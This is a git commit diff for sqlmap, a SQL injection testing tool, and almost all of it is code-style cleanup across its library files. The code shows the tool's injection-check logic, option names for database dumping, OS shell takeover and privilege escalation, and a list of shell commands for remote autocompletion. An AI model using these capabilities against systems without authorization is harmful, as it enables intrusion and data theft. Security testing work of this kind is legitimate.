sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 09:57:38 +03:00
Code Issues Packages Projects Releases Wiki Activity

Some more PEPing (I hope that I haven't broke anything)

Browse Source
This commit is contained in:
Miroslav Stampar 2018-03-13 13:45:42 +01:00
parent 8166a4eeb8
commit fa4c1c5251
66 changed files with 1157 additions and 1288 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
lib/controller/checks.py
View File

@ -146,8 +146,7 @@ def checkSqlInjection(place, parameter, value):
# error message, simple heuristic check or via DBMS-specific
# payload), ask the user to limit the tests to the fingerprinted
# DBMS
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
@ -156,9 +155,7 @@ def checkSqlInjection(place, parameter, value):
# message, via simple heuristic check or via DBMS-specific
# payload), ask the user to extend the tests to all DBMS-specific,
# regardless of --level and --risk values provided
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
kb.heuristicDbms or injection.dbms):
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "for the remaining tests, do you want to include all tests "
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "level (%d)" % conf.level if conf.level < 5 else ""
@ -242,9 +239,7 @@ def checkSqlInjection(place, parameter, value):
# Skip tests if title, vector or DBMS is not included by the
# given test filter
if conf.testFilter and not any(conf.testFilter in str(item) or \
re.search(conf.testFilter, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is not included by the given filter"
logger.debug(debugMsg)
@ -252,9 +247,7 @@ def checkSqlInjection(place, parameter, value):
# Skip tests if title, vector or DBMS is included by the
# given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg)
@ -588,10 +581,10 @@ def checkSqlInjection(place, parameter, value):
# body for the test's <grep> regular expression
try:
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
result = output == "1"
@ -873,8 +866,7 @@ def checkFalsePositives(injection):
retVal = True
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
pushValue(kb.injection)
infoMsg = "checking if the injection point on %s " % injection.place
@ -971,7 +963,7 @@ def checkFilteredChars(injection):
# inference techniques depend on character '>'
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
warnMsg = "it appears that the character '>' is "
warnMsg += "filtered by the back-end server. You are strongly "
warnMsg += "advised to rerun with the '--tamper=between'"

3
lib/controller/controller.py
View File

@ -406,8 +406,7 @@ def start():
if conf.nullConnection:
checkNullConnection()
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
and (kb.injection.place is None or kb.injection.parameter is None):
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
# NOTE: this is not needed anymore, leaving only to display

26
lib/controller/handler.py
View File

@ -56,19 +56,19 @@ def setHandler():
"""
items = [
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _:

22
lib/core/agent.py
View File

@ -294,17 +294,21 @@ class Agent(object):
if payload is None:
return
_ = (
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
replacements = (
("[DELIMITER_START]", kb.chars.start),
("[DELIMITER_STOP]", kb.chars.stop),
("[AT_REPLACE]", kb.chars.at),
("[SPACE_REPLACE]", kb.chars.space),
("[DOLLAR_REPLACE]", kb.chars.dollar),
("[HASH_REPLACE]", kb.chars.hash_),
("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
payload = payload.replace(_, str(randomInt()))
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
payload = payload.replace(_, randomStr())
if origValue is not None and "[ORIGVALUE]" in payload:
@ -928,7 +932,7 @@ class Agent(object):
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if not " ORDER BY " in limitedQuery:
if " ORDER BY " not in limitedQuery:
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]

4
lib/core/bigarray.py
View File

@ -6,9 +6,9 @@ See the file 'LICENSE' for copying permission
"""
try:
import cPickle as pickle
import cPickle as pickle
except:
import pickle
import pickle
import bz2
import itertools

2
lib/core/convert.py
View File

@ -94,7 +94,7 @@ def base64unpickle(value, unsafe=False):
try:
retVal = loads(base64decode(value))
except TypeError:
except TypeError:
retVal = loads(base64decode(bytes(value)))
return retVal

28
lib/core/defaults.py
View File

@ -8,20 +8,20 @@ See the file 'LICENSE' for copying permission
from lib.core.datatype import AttribDict
_defaults = {
"csvDel": ',',
"timeSec": 5,
"googlePage": 1,
"verbose": 1,
"delay": 0,
"timeout": 30,
"retries": 3,
"saFreq": 0,
"threads": 1,
"level": 1,
"risk": 1,
"dumpFormat": "CSV",
"tech": "BEUSTQ",
"torType": "SOCKS5",
"csvDel": ',',
"timeSec": 5,
"googlePage": 1,
"verbose": 1,
"delay": 0,
"timeout": 30,
"retries": 3,
"saFreq": 0,
"threads": 1,
"level": 1,
"risk": 1,
"dumpFormat": "CSV",
"tech": "BEUSTQ",
"torType": "SOCKS5",
}
defaults = AttribDict(_defaults)

82
lib/core/dicts.py
View File

@ -208,54 +208,60 @@ FROM_DUMMY_TABLE = {
}
SQL_STATEMENTS = {
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
"(case ", ),
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
"(case ",
),
"SQL data definition": (
"SQL data definition": (
"create ",
"declare ",
"drop ",
"truncate ",
"alter ", ),
"alter ",
),
"SQL data manipulation": (
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
"load ", ),
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
"load ",
),
"SQL data control": (
"grant ",
"revoke ", ),
"SQL data control": (
"grant ",
"revoke ",
),
"SQL data execution": (
"exec ",
"execute ",
"values ",
"call ", ),
"SQL data execution": (
"exec ",
"execute ",
"values ",
"call ",
),
"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
"rollback ", ),
"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
"rollback ",
),
}
POST_HINT_CONTENT_TYPES = {

56
lib/core/enums.py
View File

@ -242,40 +242,40 @@ class REDIRECTION:
class PAYLOAD:
SQLINJECTION = {
1: "boolean-based blind",
2: "error-based",
3: "inline query",
4: "stacked queries",
5: "AND/OR time-based blind",
6: "UNION query",
}
1: "boolean-based blind",
2: "error-based",
3: "inline query",
4: "stacked queries",
5: "AND/OR time-based blind",
6: "UNION query",
}
PARAMETER = {
1: "Unescaped numeric",
2: "Single quoted string",
3: "LIKE single quoted string",
4: "Double quoted string",
5: "LIKE double quoted string",
}
1: "Unescaped numeric",
2: "Single quoted string",
3: "LIKE single quoted string",
4: "Double quoted string",
5: "LIKE double quoted string",
}
RISK = {
0: "No risk",
1: "Low risk",
2: "Medium risk",
3: "High risk",
}
0: "No risk",
1: "Low risk",
2: "Medium risk",
3: "High risk",
}
CLAUSE = {
0: "Always",
1: "WHERE",
2: "GROUP BY",
3: "ORDER BY",
4: "LIMIT",
5: "OFFSET",
6: "TOP",
7: "Table name",
8: "Column name",
}
0: "Always",
1: "WHERE",
2: "GROUP BY",
3: "ORDER BY",
4: "LIMIT",
5: "OFFSET",
6: "TOP",
7: "Table name",
8: "Column name",
}
class METHOD:
COMPARISON = "comparison"

6
lib/core/option.py
View File

@ -687,7 +687,7 @@ def _setMetasploit():
if IS_WIN:
try:
import win32file
__import__("win32file")
except ImportError:
errMsg = "sqlmap requires third-party module 'pywin32' "
errMsg += "in order to use Metasploit functionalities on "
@ -700,7 +700,7 @@ def _setMetasploit():
retVal = None
try:
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
_ = OpenKey(_, key)
retVal = QueryValueEx(_, value)[0]
@ -2350,7 +2350,7 @@ def _checkWebSocket():
from websocket import ABNF
except ImportError:
errMsg = "sqlmap requires third-party module 'websocket-client' "
errMsg += "in order to use WebSocket funcionality"
errMsg += "in order to use WebSocket functionality"
raise SqlmapMissingDependence(errMsg)
def _checkTor():

468
lib/core/optiondict.py
View File

@ -6,250 +6,252 @@ See the file 'LICENSE' for copying permission
"""
optDict = {
# Format:
# Family: { "parameter name": "parameter datatype" },
# Or:
# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
"Target": {
"direct": "string",
"url": "string",
"logFile": "string",
"bulkFile": "string",
"requestFile": "string",
"sessionFile": "string",
"googleDork": "string",
"configFile": "string",
"sitemapUrl": "string",
},
# Family: {"parameter name": "parameter datatype"},
# --OR--
# Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},
"Request": {
"method": "string",
"data": "string",
"paramDel": "string",
"cookie": "string",
"cookieDel": "string",
"loadCookies": "string",
"dropSetCookie": "boolean",
"agent": "string",
"randomAgent": "boolean",
"host": "string",
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},
"Target": {
"direct": "string",
"url": "string",
"logFile": "string",
"bulkFile": "string",
"requestFile": "string",
"sessionFile": "string",
"googleDork": "string",
"configFile": "string",
"sitemapUrl": "string",
},
"Optimization": {
"optimize": "boolean",
"predictOutput": "boolean",
"keepAlive": "boolean",
"nullConnection": "boolean",
"threads": "integer",
},
"Request": {
"method": "string",
"data": "string",
"paramDel": "string",
"cookie": "string",
"cookieDel": "string",
"loadCookies": "string",
"dropSetCookie": "boolean",
"agent": "string",
"randomAgent": "boolean",
"host": "string",
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},
"Injection": {
"testParameter": "string",
"skip": "string",
"skipStatic": "boolean",
"paramExclude": "string",
"dbms": "string",
"dbmsCred": "string",
"os": "string",
"invalidBignum": "boolean",
"invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},
"Optimization": {
"optimize": "boolean",
"predictOutput": "boolean",
"keepAlive": "boolean",
"nullConnection": "boolean",
"threads": "integer",
},
"Detection": {
"level": "integer",
"risk": "integer",
"string": "string",
"notString": "string",
"regexp": "string",
"code": "integer",
"textOnly": "boolean",
"titles": "boolean",
},
"Injection": {
"testParameter": "string",
"skip": "string",
"skipStatic": "boolean",
"paramExclude": "string",
"dbms": "string",
"dbmsCred": "string",
"os": "string",
"invalidBignum": "boolean",
"invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},
"Techniques": {
"tech": "string",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
"uFrom": "string",
"dnsDomain": "string",
"secondOrder": "string",
},
"Detection": {
"level": "integer",
"risk": "integer",
"string": "string",
"notString": "string",
"regexp": "string",
"code": "integer",
"textOnly": "boolean",
"titles": "boolean",
},
"Fingerprint": {
"extensiveFp": "boolean",
},
"Techniques": {
"tech": "string",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
"uFrom": "string",
"dnsDomain": "string",
"secondOrder": "string",
},
"Enumeration": {
"getAll": "boolean",
"getBanner": ("boolean", "Banners"),
"getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},
"Fingerprint": {
"extensiveFp": "boolean",
},
"Brute": {
"commonTables": "boolean",
"commonColumns": "boolean",
},
"Enumeration": {
"getAll": "boolean",
"getBanner": ("boolean", "Banners"),
"getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},
"User-defined function": {
"udfInject": "boolean",
"shLib": "string",
},
"Brute": {
"commonTables": "boolean",
"commonColumns": "boolean",
},
"File system": {
"rFile": "string",
"wFile": "string",
"dFile": "string",
},
"User-defined function": {
"udfInject": "boolean",
"shLib": "string",
},
"Takeover": {
"osCmd": "string",
"osShell": "boolean",
"osPwn": "boolean",
"osSmb": "boolean",
"osBof": "boolean",
"privEsc": "boolean",
"msfPath": "string",
"tmpPath": "string",
},
"File system": {
"rFile": "string",
"wFile": "string",
"dFile": "string",
},
"Windows": {
"regRead": "boolean",
"regAdd": "boolean",
"regDel": "boolean",
"regKey": "string",
"regVal": "string",
"regData": "string",
"regType": "string",
},
"Takeover": {
"osCmd": "string",
"osShell": "boolean",
"osPwn": "boolean",
"osSmb": "boolean",
"osBof": "boolean",
"privEsc": "boolean",
"msfPath": "string",
"tmpPath": "string",
},
"General": {
#"xmlFile": "string",
"trafficFile": "string",
"batch": "boolean",
"binaryFields": "string",
"charset": "string",
"checkInternet": "boolean",
"crawlDepth": "integer",
"crawlExclude": "string",
"csvDel": "string",
"dumpFormat": "string",
"encoding": "string",
"eta": "boolean",
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
"testSkip": "string",
"updateAll": "boolean",
},
"Windows": {
"regRead": "boolean",
"regAdd": "boolean",
"regDel": "boolean",
"regKey": "string",
"regVal": "string",
"regData": "string",
"regType": "string",
},
"Miscellaneous": {
"alert": "string",
"answers": "string",
"beep": "boolean",
"cleanup": "boolean",
"dependencies": "boolean",
"disableColoring": "boolean",
"googlePage": "integer",
"identifyWaf": "boolean",
"mobile": "boolean",
"offline": "boolean",
"purgeOutput": "boolean",
"skipWaf": "boolean",
"smart": "boolean",
"tmpDir": "string",
"webRoot": "string",
"wizard": "boolean",
"verbose": "integer",
},
"Hidden": {
"dummy": "boolean",
"disablePrecon": "boolean",
"profile": "boolean",
"forceDns": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",
"runCase": "string",
},
"API": {
"api": "boolean",
"taskid": "string",
"database": "string",
}
}
"General": {
# "xmlFile": "string",
"trafficFile": "string",
"batch": "boolean",
"binaryFields": "string",
"charset": "string",
"checkInternet": "boolean",
"crawlDepth": "integer",
"crawlExclude": "string",
"csvDel": "string",
"dumpFormat": "string",
"encoding": "string",
"eta": "boolean",
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
"testSkip": "string",
"updateAll": "boolean",
},
"Miscellaneous": {
"alert": "string",
"answers": "string",
"beep": "boolean",
"cleanup": "boolean",
"dependencies": "boolean",
"disableColoring": "boolean",
"googlePage": "integer",
"identifyWaf": "boolean",
"mobile": "boolean",
"offline": "boolean",
"purgeOutput": "boolean",
"skipWaf": "boolean",
"smart": "boolean",
"tmpDir": "string",
"webRoot": "string",
"wizard": "boolean",
"verbose": "integer",
},
"Hidden": {
"dummy": "boolean",
"disablePrecon": "boolean",
"profile": "boolean",
"forceDns": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",
"runCase": "string",
},
"API": {
"api": "boolean",
"taskid": "string",
"database": "string",
}
}

2
lib/core/profiling.py
View File

@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
"""
try:
__import__("gobject")
from thirdparty.gprof2dot import gprof2dot
from thirdparty.xdot import xdot
import gobject
import gtk
import pydot
except ImportError, e:

4
lib/core/settings.py
View File

@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.2.3.22"
VERSION = "1.2.3.23"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -224,7 +224,7 @@ PYVERSION = sys.version.split()[0]
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")

20
lib/core/shell.py
View File

@ -104,20 +104,20 @@ def autoCompletion(completion=None, os=None, commands=None):
if os == OS.WINDOWS:
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
completer = CompleterNG({
"copy": None, "del": None, "dir": None,
"echo": None, "md": None, "mem": None,
"move": None, "net": None, "netstat -na": None,
"ver": None, "xcopy": None, "whoami": None,
})
"copy": None, "del": None, "dir": None,
"echo": None, "md": None, "mem": None,
"move": None, "net": None, "netstat -na": None,
"ver": None, "xcopy": None, "whoami": None,
})
else:
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
completer = CompleterNG({
"cp": None, "rm": None, "ls": None,
"echo": None, "mkdir": None, "free": None,
"mv": None, "ifconfig": None, "netstat -natu": None,
"pwd": None, "uname": None, "id": None,
})
"cp": None, "rm": None, "ls": None,
"echo": None, "mkdir": None, "free": None,
"mv": None, "ifconfig": None, "netstat -natu": None,
"pwd": None, "uname": None, "id": None,
})
readline.set_completer(completer.complete)
readline.parse_and_bind("tab: complete")

6
lib/core/subprocessng.py
View File

@ -8,7 +8,6 @@ See the file 'LICENSE' for copying permission
import errno
import os
import subprocess
import sys
import time
from lib.core.settings import IS_WIN
@ -24,11 +23,6 @@ else:
import select
import fcntl
if (sys.hexversion >> 16) >= 0x202:
FCNTL = fcntl
else:
import FCNTL
def blockingReadFromFD(fd):
# Quick twist around original Twisted function
# Blocking read from a non-blocking file descriptor

11
lib/core/target.py
View File

@ -232,7 +232,7 @@ def _setRequestParams():
